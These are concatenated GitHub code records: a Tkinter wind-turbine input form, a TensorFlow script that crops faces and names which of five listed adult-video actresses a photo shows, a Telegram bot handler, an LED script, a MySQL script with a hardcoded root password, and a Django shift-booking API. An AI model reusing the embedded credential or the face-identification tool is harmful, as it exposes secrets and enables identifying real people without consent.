Eingabefelder\n label_p_req = tk.Label(root, text=\"Jahresenergiebedarf (kWh):\")\n label_p_req.pack()\n entry_p_req = tk.Entry(root)\n entry_p_req.insert(tk.END, \"85000\")\n entry_p_req.pack()\n\n label_roughness_length = tk.Label(root, text=\"Rauigkeitslänge (m):\")\n label_roughness_length.pack()\n entry_roughness_length = tk.Entry(root)\n entry_roughness_length.insert(tk.END, \"0.1\")\n entry_roughness_length.pack()\n\n\n label_p_min = tk.Label(root, text=\"Mindestleistung des Systems (kW):\")\n label_p_min.pack()\n entry_p_min = tk.Entry(root)\n entry_p_min.insert(tk.END, \"0.300\")\n entry_p_min.pack()\n\n label_single_cell_energy = tk.Label(root, text=\"Batteriezellkapazität (kWh):\")\n label_single_cell_energy.pack()\n entry_single_cell_energy = tk.Entry(root)\n entry_single_cell_energy.insert(tk.END, str(5120 / 1000))\n entry_single_cell_energy.pack()\n\n label_single_cell_cost = tk.Label(root, text=\"Batteriezellkosten (€):\")\n label_single_cell_cost.pack()\n entry_single_cell_cost = tk.Entry(root)\n entry_single_cell_cost.insert(tk.END, \"1700\")\n entry_single_cell_cost.pack()\n\n label_interest_rate = tk.Label(root, text=\"Zinssatz:\")\n label_interest_rate.pack()\n entry_interest_rate = tk.Entry(root)\n entry_interest_rate.insert(tk.END, \"0.04\")\n entry_interest_rate.pack()\n\n label_lifetime = tk.Label(root, text=\"Betriebsdauer (a):\")\n label_lifetime.pack()\n entry_lifetime = tk.Entry(root)\n entry_lifetime.insert(tk.END, \"20\")\n entry_lifetime.pack()\n\n label_capex = tk.Label(root, text=\"Capex (€/kW):\")\n label_capex.pack()\n entry_capex = tk.Entry(root)\n entry_capex.insert(tk.END, \"4500\")\n entry_capex.pack()\n\n\n label_data_wind_path = tk.Label(root, text=\"Pfad Windgeschwindigkeitsmessung:\")\n\n label_data_wind_path.pack()\n var_data_wind_path = tk.StringVar(root)\n data_wind_files = [f for f in os.listdir('weatherdata') if os.path.isfile(os.path.join('weatherdata', f))]\n var_data_wind_path.set('Wetterdaten_Wanna_Szenario_1.txt')\n dropdown_data_wind_path = tk.OptionMenu(root, var_data_wind_path, *data_wind_files)\n dropdown_data_wind_path.pack()\n \n label_save_path_powerdata = tk.Label(root, text=\"Speicherpfad Leistungsdatei:\")\n label_save_path_powerdata.pack()\n \n entry_save_path_powerdata = tk.Entry(root)\n entry_save_path_powerdata.insert(tk.END, r'data/Wetterdaten_Wanna_Szenario_1.xlsx')\n entry_save_path_powerdata.pack()\n \n # Eingabefeld mit doppelter Breite\n entry_save_path_powerdata.config(width=40) \n\n\n label_data_power_curve_path = tk.Label(root, text=\"Pfad zur Leistungsdatei:\")\n label_data_power_curve_path.pack()\n var_data_power_curve_path = tk.StringVar(root)\n data_power_curve_files = [f for f in os.listdir('data') if os.path.isfile(os.path.join('data', f))]\n var_data_power_curve_path.set('powercurves_interpolated.csv')\n dropdown_data_power_curve_path = tk.OptionMenu(root, var_data_power_curve_path, *data_power_curve_files)\n dropdown_data_power_curve_path.pack()\n\n\n label_data_tech_path = tk.Label(root, text=\"Pfad zur Technologiedatei:\")\n label_data_tech_path.pack()\n var_data_tech_path = tk.StringVar(root)\n data_tech_files = [f for f in os.listdir('data') if os.path.isfile(os.path.join('data', f))]\n var_data_tech_path.set('technical_information.xlsx')\n dropdown_data_tech_path = tk.OptionMenu(root, var_data_tech_path, *data_tech_files)\n dropdown_data_tech_path.pack()\n\n\n # Speichern-Button\n button_save = tk.Button(root, text=\"Speichern\", command=save_values)\n button_save.pack()\n\n root.mainloop()\n\n # 
Rückgabe der eingegebenen Werte\n return (\n float(p_req),\n float(roughness_length),\n float(p_min),\n float(single_cell_energy),\n float(single_cell_cost),\n float(interest_rate),\n int(lifetime),\n float(capex),\n os.path.join(save_path_powerdata),\n os.path.join('data', data_power_curve_path),\n os.path.join('data', data_tech_path),\n os.path.join('weatherdata', data_wind_path)\n )\n","repo_name":"joda9/Windenergieanlage","sub_path":"interface.py","file_name":"interface.py","file_ext":"py","file_size_in_byte":5293,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71094727912","text":"import tensorflow as tf\nimport numpy as np\nimport re\nfrom datetime import datetime\nimport google.auth\nimport io\nimport os\nfrom oauth2client.client import GoogleCredentials\nfrom google.cloud import vision\nfrom PIL import Image\nfrom PIL import ImageDraw\nfrom crop_face import FaceDetector\nimport matplotlib\nmatplotlib.use('TkAgg') # For Max Users\nimport matplotlib.pyplot as plt\n\nflags = tf.app.flags\nFLAGS = flags.FLAGS\nFLAGS.image_size = 96\nFLAGS.image_color = 3\nFLAGS.maxpool_filter_size = 2\nFLAGS.num_classes = 5\nFLAGS.batch_size = 100\nFLAGS.learning_rate = 0.0001\nFLAGS.log_dir = './logs_prediction/'\n\n\ndef get_input_queue(csv_file_name, num_epochs=None):\n train_images = []\n train_labels = []\n for line in open(csv_file_name, 'r'):\n cols = re.split(',|\\n', line)\n train_images.append(cols[0])\n # 3rd column is label and needs to be converted to int type\n train_labels.append(int(cols[2]))\n\n input_queue = tf.train.slice_input_producer([train_images, train_labels],\n num_epochs=num_epochs, shuffle=True)\n\n return input_queue\n\n\ndef read_data(input_queue):\n image_file = input_queue[0]\n label = input_queue[1]\n\n image = tf.image.decode_jpeg(tf.read_file(image_file), channels=FLAGS.image_color)\n\n return image, label, image_file\n\n\ndef read_data_batch(csv_file_name, batch_size=FLAGS.batch_size):\n input_queue = get_input_queue(csv_file_name)\n image, label, file_name = read_data(input_queue)\n image = tf.reshape(image, [FLAGS.image_size, FLAGS.image_size, FLAGS.image_color])\n\n # random image\n image = tf.image.random_flip_left_right(image)\n image = tf.image.random_brightness(image, max_delta=0.5)\n image = tf.image.random_contrast(image, lower=0.2, upper=2.0)\n image = tf.image.random_hue(image, max_delta=0.08)\n image = tf.image.random_saturation(image, lower=0.2, upper=2.0)\n\n batch_image, batch_label, batch_file = tf.train.batch([image, label, file_name], batch_size=batch_size)\n # ,enqueue_many=True)\n batch_file = tf.reshape(batch_file, [batch_size, 1])\n\n batch_label_on_hot = tf.one_hot(tf.to_int64(batch_label),\n FLAGS.num_classes, on_value=1.0, off_value=0.0)\n return batch_image, batch_label_on_hot, batch_file\n\n\n# convolutional network layer 1\ndef conv1(input_data):\n # layer 1 (convolutional layer)\n FLAGS.conv1_filter_size = 3\n FLAGS.conv1_layer_size = 16\n FLAGS.stride1 = 1\n\n with tf.name_scope('conv_1'):\n W_conv1 = tf.Variable(tf.truncated_normal(\n [FLAGS.conv1_filter_size, FLAGS.conv1_filter_size, FLAGS.image_color, FLAGS.conv1_layer_size],\n stddev=0.1))\n b1 = tf.Variable(tf.truncated_normal(\n [FLAGS.conv1_layer_size], stddev=0.1))\n h_conv1 = tf.nn.conv2d(input_data, W_conv1, strides=[1, 1, 1, 1], padding='SAME')\n h_conv1_relu = tf.nn.relu(tf.add(h_conv1, b1))\n h_conv1_maxpool = tf.nn.max_pool(h_conv1_relu\n , ksize=[1, 2, 2, 1]\n , strides=[1, 2, 2, 1], padding='SAME')\n\n return 
h_conv1_maxpool\n\n\n# convolutional network layer 2\ndef conv2(input_data):\n FLAGS.conv2_filter_size = 3\n FLAGS.conv2_layer_size = 32\n FLAGS.stride2 = 1\n\n with tf.name_scope('conv_2'):\n W_conv2 = tf.Variable(tf.truncated_normal(\n [FLAGS.conv2_filter_size, FLAGS.conv2_filter_size, FLAGS.conv1_layer_size, FLAGS.conv2_layer_size],\n stddev=0.1))\n b2 = tf.Variable(tf.truncated_normal(\n [FLAGS.conv2_layer_size], stddev=0.1))\n h_conv2 = tf.nn.conv2d(input_data, W_conv2, strides=[1, 1, 1, 1], padding='SAME')\n h_conv2_relu = tf.nn.relu(tf.add(h_conv2, b2))\n h_conv2_maxpool = tf.nn.max_pool(h_conv2_relu\n , ksize=[1, 2, 2, 1]\n , strides=[1, 2, 2, 1], padding='SAME')\n\n return h_conv2_maxpool\n\n\n# convolutional network layer 3\ndef conv3(input_data):\n FLAGS.conv3_filter_size = 3\n FLAGS.conv3_layer_size = 64\n FLAGS.stride3 = 1\n\n print('## FLAGS.stride1 ', FLAGS.stride1)\n with tf.name_scope('conv_3'):\n W_conv3 = tf.Variable(tf.truncated_normal(\n [FLAGS.conv3_filter_size, FLAGS.conv3_filter_size, FLAGS.conv2_layer_size, FLAGS.conv3_layer_size],\n stddev=0.1))\n b3 = tf.Variable(tf.truncated_normal(\n [FLAGS.conv3_layer_size], stddev=0.1))\n h_conv3 = tf.nn.conv2d(input_data, W_conv3, strides=[1, 1, 1, 1], padding='SAME')\n h_conv3_relu = tf.nn.relu(tf.add(h_conv3, b3))\n h_conv3_maxpool = tf.nn.max_pool(h_conv3_relu\n , ksize=[1, 2, 2, 1]\n , strides=[1, 2, 2, 1], padding='SAME')\n\n return h_conv3_maxpool\n\n\n# convolutional network layer 3\ndef conv4(input_data):\n FLAGS.conv4_filter_size = 5\n FLAGS.conv4_layer_size = 128\n FLAGS.stride4 = 1\n\n with tf.name_scope('conv_4'):\n W_conv4 = tf.Variable(tf.truncated_normal(\n [FLAGS.conv4_filter_size, FLAGS.conv4_filter_size, FLAGS.conv3_layer_size, FLAGS.conv4_layer_size],\n stddev=0.1))\n b4 = tf.Variable(tf.truncated_normal(\n [FLAGS.conv4_layer_size], stddev=0.1))\n h_conv4 = tf.nn.conv2d(input_data, W_conv4, strides=[1, 1, 1, 1], padding='SAME')\n h_conv4_relu = tf.nn.relu(tf.add(h_conv4, b4))\n h_conv4_maxpool = tf.nn.max_pool(h_conv4_relu\n , ksize=[1, 2, 2, 1]\n , strides=[1, 2, 2, 1], padding='SAME')\n\n return h_conv4_maxpool\n\n\n# fully connected layer 1\ndef fc1(input_data):\n input_layer_size = 6 * 6 * FLAGS.conv4_layer_size\n FLAGS.fc1_layer_size = 512\n\n with tf.name_scope('fc_1'):\n # 앞에서 입력받은 다차원 텐서를 fcc에 넣기 위해서 1차원으로 피는 작업\n input_data_reshape = tf.reshape(input_data, [-1, input_layer_size])\n W_fc1 = tf.Variable(tf.truncated_normal([input_layer_size, FLAGS.fc1_layer_size], stddev=0.1))\n b_fc1 = tf.Variable(tf.truncated_normal(\n [FLAGS.fc1_layer_size], stddev=0.1))\n h_fc1 = tf.add(tf.matmul(input_data_reshape, W_fc1), b_fc1) # h_fc1 = input_data*W_fc1 + b_fc1\n h_fc1_relu = tf.nn.relu(h_fc1)\n\n return h_fc1_relu\n\n\n# fully connected layer 2\ndef fc2(input_data):\n FLAGS.fc2_layer_size = 256\n\n with tf.name_scope('fc_2'):\n W_fc2 = tf.Variable(tf.truncated_normal([FLAGS.fc1_layer_size, FLAGS.fc2_layer_size], stddev=0.1))\n b_fc2 = tf.Variable(tf.truncated_normal(\n [FLAGS.fc2_layer_size], stddev=0.1))\n h_fc2 = tf.add(tf.matmul(input_data, W_fc2), b_fc2) # h_fc1 = input_data*W_fc1 + b_fc1\n h_fc2_relu = tf.nn.relu(h_fc2)\n\n return h_fc2_relu\n\n\n# final layer\ndef final_out(input_data):\n with tf.name_scope('final_out'):\n W_fo = tf.Variable(tf.truncated_normal([FLAGS.fc2_layer_size, FLAGS.num_classes], stddev=0.1))\n b_fo = tf.Variable(tf.truncated_normal(\n [FLAGS.num_classes], stddev=0.1))\n h_fo = tf.add(tf.matmul(input_data, W_fo), b_fo) # h_fc1 = input_data*W_fc1 + b_fc1\n\n # 최종 레이어에 softmax 
함수는 적용하지 않았다.\n\n return h_fo\n\n\n# build cnn_graph\ndef build_model(images, keep_prob):\n # define CNN network graph\n # output shape will be (*,48,48,16)\n r_cnn1 = conv1(images) # convolutional layer 1\n # print(\"shape after cnn1 \", r_cnn1.get_shape())\n\n # output shape will be (*,24,24,32)\n r_cnn2 = conv2(r_cnn1) # convolutional layer 2\n # print(\"shape after cnn2 :\", r_cnn2.get_shape())\n\n # output shape will be (*,12,12,64)\n r_cnn3 = conv3(r_cnn2) # convolutional layer 3\n # print(\"shape after cnn3 :\", r_cnn3.get_shape())\n\n # output shape will be (*,6,6,128)\n r_cnn4 = conv4(r_cnn3) # convolutional layer 4\n # print(\"shape after cnn4 :\", r_cnn4.get_shape())\n\n # fully connected layer 1\n r_fc1 = fc1(r_cnn4)\n # print(\"shape after fc1 :\", r_fc1.get_shape())\n\n # fully connected layer2\n r_fc2 = fc2(r_fc1)\n # print(\"shape after fc2 :\", r_fc2.get_shape())\n\n ## drop out\n # 참고 http://stackoverflow.com/questions/34597316/why-input-is-scaled-in-tf-nn-dropout-in-tensorflow\n # 트레이닝시에는 keep_prob < 1.0 , Test 시에는 1.0으로 한다.\n r_dropout = tf.nn.dropout(r_fc2, keep_prob)\n # print(\"shape after dropout :\", r_dropout.get_shape())\n\n # final layer\n r_out = final_out(r_dropout)\n # print(\"shape after final layer :\", r_out.get_shape())\n\n return r_out\n\n\ndef build_graph_and_predict():\n # Start build a graph\n images = tf.placeholder(tf.float32, [None, FLAGS.image_size, FLAGS.image_size, FLAGS.image_color])\n keep_prob = tf.placeholder(tf.float32) # dropout ratio\n\n prediction = tf.nn.softmax(build_model(images, keep_prob))\n sess = tf.InteractiveSession()\n sess.run(tf.global_variables_initializer())\n saver = tf.train.Saver()\n saver.restore(sess, './models/face_recog1') # Load exist model\n\n\n # Start predict\n imagefile = input(\"Enter the location of image >>\")\n\n FLAGS.image_size = 96\n\n # set service account file into OS environment value\n # os.environ[\"GOOGLE_APPLICATION_CREDENTIALS\"] = \"./AV-Actor-Face-detecter-c1946c787efb.json\"\n #\n # visionClient = vision.Client()\n # print('[INFO] processing %s' % (imagefile))\n #\n # # detect face\n # image = visionClient.image(filename=imagefile)\n # faces = image.detect_faces()\n # face = faces[0]\n #\n # print('number of faces ', len(faces))\n #\n # # get face location in the photo\n # left = face.fd_bounds.vertices[0].x_coordinate\n # top = face.fd_bounds.vertices[0].y_coordinate\n # right = face.fd_bounds.vertices[2].x_coordinate\n # bottom = face.fd_bounds.vertices[2].y_coordinate\n # rect = [left, top, right, bottom]\n\n fDetector = FaceDetector()\n # rect = fDetector.detect_face(image_file=imagefile)\n rect = fDetector.detect_face_without_check_skew_angle(image_file=imagefile)\n\n print(\"rect : \", rect)\n\n fd = io.open(imagefile, 'rb')\n image = Image.open(fd)\n\n # display original image\n print(\"Original image\")\n # plt.imshow(image)\n # plt.show()\n\n # draw green box for face in the original image\n print(\"Detect face boundary box \")\n draw = ImageDraw.Draw(image)\n draw.rectangle(rect, fill=None, outline=\"green\")\n\n # plt.imshow(image)\n # plt.show()\n\n crop = image.crop(rect)\n im = crop.resize((FLAGS.image_size, FLAGS.image_size), Image.ANTIALIAS)\n # plt.show()\n imagename = imagefile.split('/')[-1]\n im.save('cropped/' + imagename)\n\n print(\"Cropped image\")\n tfimage = tf.image.decode_jpeg(tf.read_file('cropped/' + imagename), channels=3)\n tfimage_value = tfimage.eval()\n tfimages = []\n tfimages.append(tfimage_value)\n # plt.imshow(tfimage_value)\n # plt.show()\n fd.close()\n\n 
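# run the restored softmax graph on the single cropped face; keep_prob=1.0 disables dropout at inference time\n 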
p_val = sess.run(prediction, feed_dict={images: tfimages, keep_prob: 1.0})\n name_labels = ['Airi Suzumura', 'Kana Momonogi', 'Kirara Asuka', 'Koharu Suzuki', 'Yura Sakura']\n i = 0\n for p in p_val[0]:\n print('%s %f' % (name_labels[i], float(p)))\n i = i + 1\n\n\nif __name__ == '__main__':\n build_graph_and_predict()\n","repo_name":"thanh109/AV-Actor-Finder","sub_path":"prediction.py","file_name":"prediction.py","file_ext":"py","file_size_in_byte":11375,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"12972642487","text":"import logging\nimport datetime\n\nfrom config.config_reader import load_config\nfrom config.configuration import Constants, Settings\n\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\n\nfrom bot import keyboards\nfrom bot.db import users\n\n\nfrom aiogram.dispatcher import FSMContext\nfrom aiogram import Dispatcher, types\nfrom aiogram.dispatcher.filters import Text\n\n\nlogger = logging.getLogger(__name__)\nconfig = load_config(\"config/bot.ini\")\n\n\nclass EditSettings(StatesGroup):\n waiting_for_choose_what_edit = State()\n\n\nasync def register_user(message: types.Message, state: FSMContext):\n now_date = datetime.datetime.now().strftime(Settings.date_format).split()[0]\n # Добавить выбор языка\n uts_select = await message.answer(Constants.settings_text[\"selecting_utc\"][\"ru\"],\n parse_mode=\"HTML\", reply_markup=keyboards.inline_kb_utc)\n await state.update_data(message_id=uts_select.message_id)\n\n users.add_user(str(message.from_user.id), str(message.chat.id), 'ru', 0, \"not_set\", now_date)\n logger.warning(\"Registered new user. user_id: {0}, chat_id: {1}, user_name: {2}\".format(message.from_user.id,\n message.chat.id,\n message.from_user.username))\n start = Constants.user_commands.get(\"start\")\n await message.answer(start[\"text\"][\"ru\"].format(bot_name=config.bot.name), parse_mode=\"HTML\",\n reply_markup=keyboards.kb_main_menu)\n await message.answer(Constants.settings_text[\"check_examples\"][\"ru\"], parse_mode=\"HTML\")\n\n\nasync def cmd_settings(message: types.Message, state: FSMContext):\n data = users.get_user_data(message.chat.id)\n if data[5] == \"not_set\":\n uts_select = await message.answer(Constants.settings_text[\"selecting_utc\"][\"ru\"], parse_mode=\"HTML\",\n reply_markup=keyboards.inline_kb_utc)\n return await state.update_data(message_id=uts_select.message_id)\n\n settings = Constants.user_commands.get(\"settings\")\n await message.answer(settings[\"text\"][\"ru\"].format(registered=data[6], reminders_sent=data[4],\n language=\"🇷🇺 русский\", time_zone=data[5]),\n parse_mode=\"HTML\", reply_markup=keyboards.inline_kb_edit_settings)\n\n await EditSettings.waiting_for_choose_what_edit.set()\n\n\nasync def set_utc(call: types.CallbackQuery, state: FSMContext):\n data = await state.get_data()\n await state.finish()\n if data.get(\"message_id\"):\n await call.bot.delete_message(call.message.chat.id, data[\"message_id\"])\n\n time_zone = call.data.split()[1]\n\n users.update_time_zone(call.message.chat.id, time_zone)\n logger.debug(\"User {0} set time_zone {1}.\".format(call.message.chat.id, time_zone))\n await call.message.answer(Constants.settings_text[\"utc_set\"][\"ru\"].format(time_zone=time_zone),\n parse_mode=\"HTML\", reply_markup=keyboards.kb_main_menu)\n\n\nasync def edit_time_zone(call: types.CallbackQuery, state: FSMContext):\n await state.finish()\n uts_select = await call.message.answer(Constants.settings_text[\"selecting_utc\"][\"ru\"], 
parse_mode=\"HTML\",\n reply_markup=keyboards.inline_kb_utc)\n await state.update_data(message_id=uts_select.message_id)\n\n\ndef register_handlers_settings(dp: Dispatcher):\n dp.register_message_handler(cmd_settings, commands=\"settings\", state=\"*\")\n dp.register_callback_query_handler(edit_time_zone, text=\"edit_time_zone\", state=EditSettings.waiting_for_choose_what_edit)\n dp.register_callback_query_handler(set_utc, text=Settings.callback_utc_data, state='*')\n\n","repo_name":"Yastrah/Telegram-bot-Notify","sub_path":"bot/handlers/settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71465269994","text":"import math\nimport time\nfrom colorsys import hsv_to_rgb\nfrom typing import Any\nfrom typing import Callable\nfrom typing import Tuple\n\nimport busio\nfrom adafruit_neotrellis.neotrellis import NeoTrellis\nfrom board import SCL, SDA\n\nBUTTON_COUNT = 16\n\nFRAME_RATE = 30\nSLEEP_TIME = 30 / 1000.0\n\nFloatColor = Tuple[float, float, float]\nByteColor = Tuple[int, int, int]\n\n\ndef float_to_byte_color(float_color: FloatColor) -> ByteColor:\n return (\n int(float_color[0] * 255),\n int(float_color[1] * 255),\n int(float_color[2] * 255),\n )\n\n\ndef sin_time(cadence: float) -> float:\n return (math.sin(time.time() * cadence) + 1.0) / 2.0\n\n\ndef cos_time(cadence: float) -> float:\n return (math.cos(time.time() * cadence) + 1.0) / 2.0\n\n\ndef button_callback(trellis: NeoTrellis, i: int) -> Callable[..., Any]:\n def _button_callback(event):\n if event.edge == NeoTrellis.EDGE_FALLING:\n trellis.pixels[event.number] = (0, 0, 0)\n elif event.edge == NeoTrellis.EDGE_RISING:\n trellis.pixels[event.number] = (255, 0, 127)\n return _button_callback\n\n\ndef button_target_color(i: int) -> ByteColor:\n OUTER_RING = {0, 1, 2, 3, 4, 7, 8, 11, 12, 13, 14, 15}\n INNER_RING = {5, 6, 9, 10}\n\n if i in OUTER_RING:\n float_color = hsv_to_rgb(sin_time(0.25), 0.8, 0.8)\n if i in INNER_RING:\n float_color = hsv_to_rgb(cos_time(0.25), 0.8, 0.8)\n\n return float_to_byte_color(float_color)\n\n\ndef main(trellis: NeoTrellis):\n for i in range(BUTTON_COUNT):\n trellis.activate_key(i, NeoTrellis.EDGE_RISING)\n trellis.activate_key(i, NeoTrellis.EDGE_FALLING)\n trellis.callbacks[i] = button_callback(trellis, i)\n\n while True:\n for i in range(BUTTON_COUNT):\n trellis.pixels[i] = button_target_color(i)\n\n trellis.sync()\n time.sleep(0.02)\n\n\nif __name__ == \"__main__\":\n i2c = busio.I2C(SCL, SDA)\n trellis = NeoTrellis(i2c)\n try:\n main(trellis)\n except KeyboardInterrupt:\n for i in range(BUTTON_COUNT):\n trellis.pixels[i] = (0, 0, 0)\n","repo_name":"crockeo/crockeo-trellis","sub_path":"app/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":2071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"41478838891","text":"#!/usr/bin/python3\nimport mysql.connector\nimport webbrowser\n\nconn = mysql.connector.connect(user='root', password='SAVEearth16$',\n host='10.0.1.168',database='cust_details')\n\nif conn:\n print (\"Connected Successfully\")\nelse:\n print (\"Connection Not Established\")\n\nselect_employee = \"\"\"SELECT * FROM employee\"\"\"\ncursor = conn.cursor()\ncursor.execute(select_employee)\nresult = cursor.fetchall()\n\n\np = []\n\ntbl = print (\"First NameLast Name\")\np.append(tbl)\n\nfor row in result:\n a = \"%s\"%row[0]\n print (\"p.append(a)\")\n b = \"%s\"%row[1]\n 
print(\"p.append(b)\")\n\n\n\nif(conn.is_connected()):\n cursor.close()\n conn.close()\n print(\"MySQL connection is closed.\") \n","repo_name":"midhunmenon99-hub/public_submit-form_private_database","sub_path":"cgi-enabled/newpython.py","file_name":"newpython.py","file_ext":"py","file_size_in_byte":753,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"30906826940","text":"\nfrom django.shortcuts import render,HttpResponse\nfrom rest_framework.response import Response\nfrom staff_admin.models import *\nfrom staff_app.serialize import *\nfrom employee_web import *\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.authtoken.views import ObtainAuthToken\nfrom rest_framework.authtoken.models import Token\nfrom rest_framework.pagination import PageNumberPagination\n\nfrom rest_framework.decorators import api_view\nfrom django.db.models import Q\n#from . permission import IsAdmin,IsCompany,IsJobSeeker\nfrom django.conf import settings\nfrom django.core.mail import send_mail\nfrom django.views.decorators.csrf import csrf_exempt\nfrom rest_framework.decorators import authentication_classes,permission_classes\nimport random\nimport datetime \nfrom django.conf import settings\nfrom staff_app.helpers import get_object, sendSMS,timeSheetValidation\nfrom twilio.rest import Client\n\nfrom staff_app.permission import IsCompany,IsJobSeeker\nfrom .helpers import *\nfrom_mail=settings.EMAIL_HOST_USER\n\nfrom_no=settings.TWILIO_NUMBER\nsms_sid=settings.TWILIO_ACCOUNT_SID\nsms_token=settings.TWILIO_AUTH_TOKEN\nimport json\nimport uuid\nfrom base64 import b64decode\nfrom django.core.files.base import ContentFile \n\n\n\n@csrf_exempt\n@api_view(['GET'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker])\ndef shiftListByStatus(request):\n if request.method=='GET':\n set_pending()\n usr=request.user\n paginat=PageNumberPagination()\n paginat.page_size=10\n paginat.page_size_query_param='page_size'\n \n try:\n val=request.GET.get('shift_list')\n \n except:\n pass\n now_date=datetime.now()\n # now_date=now_datetime.date()\n # now_time=now_datetime.time()\n \n if val=='booked':\n print(now_date)\n ob=Shift_Post.objects.filter(applicant=usr).exclude(in_time__lte=now_date)\n print(ob)\n obj=Shift_Post.objects.filter(applicant=usr).filter(accepted=True,status=True).exclude(in_time__lte=now_date).order_by('-create_at')\n result_obj=paginat.paginate_queryset(obj,request)\n sez=ApplcantShiftSerialize(result_obj,many=True,context={'current_user':usr,'request':request})\n \n elif val=='completed':\n obj=Shift_Post.objects.filter(applicant=usr).filter(completed=True,status=True,accepted=True).order_by('-create_at')\n \n result_obj=paginat.paginate_queryset(obj,request)\n sez=ApplcantShiftSerialize(result_obj,many=True,context={'current_user':usr ,'request':request})\n elif val=='available':\n obj=Shift_Post.objects.exclude(completed=True).exclude(accepted=True).exclude(pending=True).exclude(status=False).exclude(time_sheet=True).order_by('-create_at')\n result_obj=paginat.paginate_queryset(obj,request)\n sez=ApplcantShiftSerialize(result_obj,many=True,context={'current_user':usr,'request':request})\n\n elif val=='timesheet':\n \n \n \n obj=Shift_Post.objects.filter(applicant=usr).filter(accepted=True,status=True).filter(in_time__lte=now_date).order_by('-create_at')\n result_obj=paginat.paginate_queryset(obj,request)\n 
sez=ApplcantShiftSerialize(result_obj,many=True,context={'current_user':usr,'request':request})\n\n        else:\n            return Response({\n                'status':0,\n                'message':'Please send a correct key',\n                'data':[],\n                \n            })\n\n        t=sez.data\n        response=paginat.get_paginated_response(t)\n        response.data['message']='data fetched successfully'\n        response.data['status']=1\n        return Response(response.data)\n\n\n\n@csrf_exempt\n@api_view(['GET'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker])\ndef shiftBooking(request):\n    if request.method=='GET': \n        id=request.GET.get('id')\n        usr=request.user\n        now_date=datetime.now()\n        a=json.loads(id)\n        try:\n            shift_obj=Shift_Post.objects.get(id=a)\n        except:\n            return Response({\n                'status':1,\n                'message':'Shift id does not exist',\n                'data':[]\n                \n            })\n        try:\n            check_time=TimeSheet.objects.get(shift=shift_obj)\n        except:\n            emp_obj=shift_obj.employee\n            time_obj=TimeSheet.objects.create(applicant=usr,shift=shift_obj,employee=emp_obj)\n            \n        if a:    \n            shift_obj.accepted=True\n            shift_obj.applicant=usr\n            shift_obj.save()\n            emp_user=shift_obj.employee\n            try:\n                send_app_pdf(emp_user)\n            except:\n                pass\n            return Response({\n                'status':1,\n                'message':'Successfully booked shift',\n                'data':[]\n                \n            })\n        else:\n            return Response({\n                'status':1,\n                'message':'Something went wrong',\n                'data':[]\n                \n            })\n\n\n\n\n@csrf_exempt\n@api_view(['GET'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker])\ndef shiftBookingCancel(request):\n    if request.method=='GET':\n        \n        shift_id=request.GET.get('shift_id')\n        ids=json.loads(shift_id)\n        try:\n            obj=Shift_Post.objects.get(id=ids)\n        except:\n            return Response({\n                'status':0,\n                'message':'shift id does not exist',\n                'data':[]\n                \n            })\n\n        obj.accepted=False\n        obj.save()\n\n\n\n        return Response({\n            'status':1,\n            'message':'Successfully cancelled shift',\n            'data':[]\n            \n        })\n\n\n\n\n\n\n@csrf_exempt\n@api_view(['POST'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker]) \ndef applicantDetails(request):\n    if request.method=='POST':\n        usr=request.user\n        data=request.data\n        print(request.data)\n        print(request.FILES,'-----------')\n        try:\n            \n            vaccinate=request.data['vaccinated']\n            x={1:'Fully Vaccinated', 2:'Not Vaccinated' ,3:'Partially Vaccinated'}\n            z=x[int(vaccinate)]\n        except:\n            z=None\n        \n        try:\n            img=request.FILES.get('image')\n            print(img,\"fffffffffffffffffffffff\")\n        except:\n            img=None\n        \n        try:\n            \n            app_obj=ApplicantDeatails.objects.get(user=usr)\n            token, created = Token.objects.get_or_create(user=usr)\n            user_info=user_details(usr,token,usr_request=request)\n            return Response({\n                'status':0,\n                'message':'User already updated details',\n                'data':user_info})\n        except:\n\n            sez=ApplicantDeatailSerialize(data=data,context={'request':request})\n            token, created = Token.objects.get_or_create(user=usr)\n            \n            if sez.is_valid(raise_exception=False):\n                sez.save(user=usr,vaccinated=z,image=img)\n                \n                token, created = Token.objects.get_or_create(user=usr)\n                \n                user_info=user_details(usr,token)\n                try:\n                    obj=User.objects.get(id=usr.id)\n                    obj.company_profile_status=True\n                    obj.save()\n                except:\n                    pass\n                return Response({\n                'status':1,\n                'message':'Successfully 
updated data',\n                'data':user_info\n                \n            })\n            else:    \n                \n                for i in sez.errors:\n                    a=0\n                    l=sez.errors[i]\n                    s=f'{i}-{l[0]}'\n                    a+=1\n                    if a==1:\n                        response = {\n                            'status': 0,\n                            'message':s,\n\n                            'data': []\n                        }\n\n                return Response(response)\n\n\n\n@csrf_exempt\n@api_view(['GET'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker]) \ndef shift_details(request):\n    if request.method=='GET':\n        a=request.GET.get('id')\n        usr=request.user\n        try:\n            obj=Shift_Post.objects.get(id=a)\n        except:\n            return Response({\n                'status':0,\n                'message':'Shift POST does not exist',\n                'data':[],\n                \n            })\n        sez=ShiftDetailSerialize(obj,context={'current_user':usr})\n        return Response({\n            'status':1,\n            'message':'Successfully fetched data',\n            'data':sez.data,\n            \n        })\n\n\n\n\n@csrf_exempt\n@api_view(['GET'])\n@authentication_classes([TokenAuthentication])\n@permission_classes([IsJobSeeker]) \ndef timeSheet(request):\n    if request.method=='GET':\n        usr=request.user\n        obj=Shift_Post.objects.filter(applicant=usr,accepted=True,time_sheet=False)\n        sez=TimeSheetSerialize(obj,many=True)\n        return Response({\n            'status':1,\n            'message':'Successfully fetched data',\n            'data':sez.data\n            \n        